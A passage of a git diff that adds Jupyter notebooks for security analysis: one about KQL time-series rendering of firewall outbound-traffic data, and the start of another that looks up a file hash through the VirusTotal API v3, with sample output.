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"
+    }
+   },
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Using Built-in KQL render operator\n",
+    "Render operator instructs the user agent to render the results of the query in a particular way. In this case, we are using timechart which will display linegraph.\n",
+    "\n",
+    "***KQL Reference Documentation:***\n",
+    "- [render](https://docs.microsoft.com/azure/kusto/query/renderoperator?pivots=azuremonitor)\n",
+    "\n",
+    "***sample python code with KQL query leveraging render operator on time series data will look like below***\n",
+    "```python\n",
+    "timechartquery = \"\"\"\n",
+    "let TimeSeriesData = PaloAltoTimeSeriesDemo_CL\n",
+    "| extend TimeGenerated = todatetime(EventTime_s), TotalBytesSent = todouble(TotalBytesSent_s) \n",
+    "| summarize TimeGenerated=make_list(TimeGenerated, 10000),TotalBytesSent=make_list(TotalBytesSent, 10000) by deviceVendor_s\n",
+    "| project TimeGenerated, TotalBytesSent;\n",
+    "TimeSeriesData\n",
+    "| extend (baseline,seasonal,trend,residual) = series_decompose(TotalBytesSent)\n",
+    "| mv-expand TotalBytesSent to typeof(double), TimeGenerated to typeof(datetime), baseline to typeof(long), seasonal to typeof(long), trend to typeof(long), residual to typeof(long)\n",
+    "| project TimeGenerated, TotalBytesSent, baseline\n",
+    "| render timechart with (title=\"Palo Alto Outbound Data Transfer Time Series decomposition\")\n",
+    "\"\"\"\n",
+    "%kql -query timechartquery\n",
+    "```\n",
+    "\n",
+    "***Rendered output for the above code look like below image***\n",
+    "\n",
+    "![TimeSeriesKQLPlotly.PNG](attachment:TimeSeriesKQLPlotly.PNG)"
+   ]
+  }
+ ],
+ "metadata": {
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": true,
+   "toc_position": {
+    "height": "calc(100% - 180px)",
+    "left": "10px",
+    "top": "150px",
+    "width": "165px"
+   },
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/VTLookupV3.ipynb b/docs/notebooks/VTLookupV3.ipynb
new file mode 100644
index 000000000..0ffe29301
--- /dev/null
+++ b/docs/notebooks/VTLookupV3.ipynb
@@ -0,0 +1,1519 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "source": [
+    "# VT Graphs in Jupyter Notebook\n",
+    "\n",
+    "In this notebook we will explore how to obtain attributes and relationship for different entities using VirusTotal API v3. Finally we can render all the relationships we have obtained using VTGraph."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## Import libraries"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "source": [
+    "from msticpy.sectools.vtlookupv3 import VTLookupV3, VTEntityType\n",
+    "\n",
+    "import networkx as nx\n",
+    "import matplotlib.pyplot as plt\n",
+    "import os\n",
+    "import pandas as pd\n",
+    "\n",
+    "pd.set_option('max_colwidth', 200)\n",
+    "\n",
+    "try:\n",
+    "    import nest_asyncio\n",
+    "except ImportError as err:\n",
+    "    print(\"nest_asyncio is required for running VTLookup3 in notebooks.\")\n",
+    "    resp = input(\"Install now? (y/n)\")\n",
+    "    if resp.strip().lower().startswith(\"y\"):\n",
+    "        %pip install nest_asyncio\n",
+    "        import nest_asyncio\n",
+    "    else:\n",
+    "        raise err\n",
+    "nest_asyncio.apply()"
+   ],
+   "outputs": [],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-27T21:14:26.577974Z",
+     "start_time": "2020-10-27T21:14:26.563976Z"
+    }
+   }
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## Create Lookup instance"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "source": [
+    "from msticpy.common.provider_settings import get_provider_settings\r\n",
+    "# Try to obtain key from env varaible\r\n",
+    "vt_key = os.environ.get(\"VT_API_KEY\")\r\n",
+    "if not vt_key:\r\n",
+    "    # if not try provider settings to get from msticpyconfig.yaml\r\n",
+    "    vt_key = get_provider_settings(\"TIProviders\")[\"VirusTotal\"].args[\"AuthKey\"]"
+   ],
+   "outputs": [],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-27T21:31:33.176432Z",
+     "start_time": "2020-10-27T21:31:33.159512Z"
+    }
+   }
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "source": [
+    "# Instantiate vt_lookup object\n",
+    "vt_lookup = VTLookupV3(vt_key)"
+   ],
+   "outputs": [],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-27T21:31:46.681003Z",
+     "start_time": "2020-10-27T21:31:46.663001Z"
+    }
+   }
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "source": [
+    "# The ID (SHA256 hash) of the file to lookup\n",
+    "FILE = 'ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa'"
+   ],
+   "outputs": [],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-27T21:31:50.501013Z",
+     "start_time": "2020-10-27T21:31:50.487012Z"
+    }
+   }
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "source": [
+    "example_attribute_df = vt_lookup.lookup_ioc(observable=FILE, vt_type='file')\r\n",
+    "example_attribute_df"
+   ],
+   "outputs": [
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "                                                                  last_submission_date  \\\n",
+       "id                                                                                       \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa            1605582797   \n",
+       "\n",
+       "                                                                     size  \\\n",
+       "id                                                                          \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa  3514368   \n",
+       "\n",
+       "                                                                  times_submitted  \\\n",
+       "id                                                                                  \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa             1325   \n",
+       "\n",
+       "                                                                 meaningful_name  \\\n",
+       "id                                                                                 \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa    diskpart.exe   \n",
+       "\n",
+       "                                                                 type_description  \\\n",
+       "id                                                                                  \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa        Win32 EXE   \n",
+       "\n",
+       "                                                                  first_submission_date  \\\n",
+       "id                                                                                        \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa             1494574270   \n",
+       "\n",
+       "                                                                  detections  \\\n",
+       "id                                                                             \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa          67   \n",
+       "\n",
+       "                                                                  scans  \\\n",
+       "id                                                                        \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa     76   \n",
+       "\n",
+       "                                                                          first_submission  \\\n",
+       "id                                                                                           \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa 2017-05-12 07:31:10+00:00   \n",
+       "\n",
+       "                                                                           last_submission  \\\n",
+       "id                                                                                           \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa 2020-11-17 03:13:17+00:00   \n",
+       "\n",
+       "                                                                  type  \n",
+       "id                                                                      \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa  file  "
+      ],
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>last_submission_date</th>\n",
+       "      <th>size</th>\n",
+       "      <th>times_submitted</th>\n",
+       "      <th>meaningful_name</th>\n",
+       "      <th>type_description</th>\n",
+       "      <th>first_submission_date</th>\n",
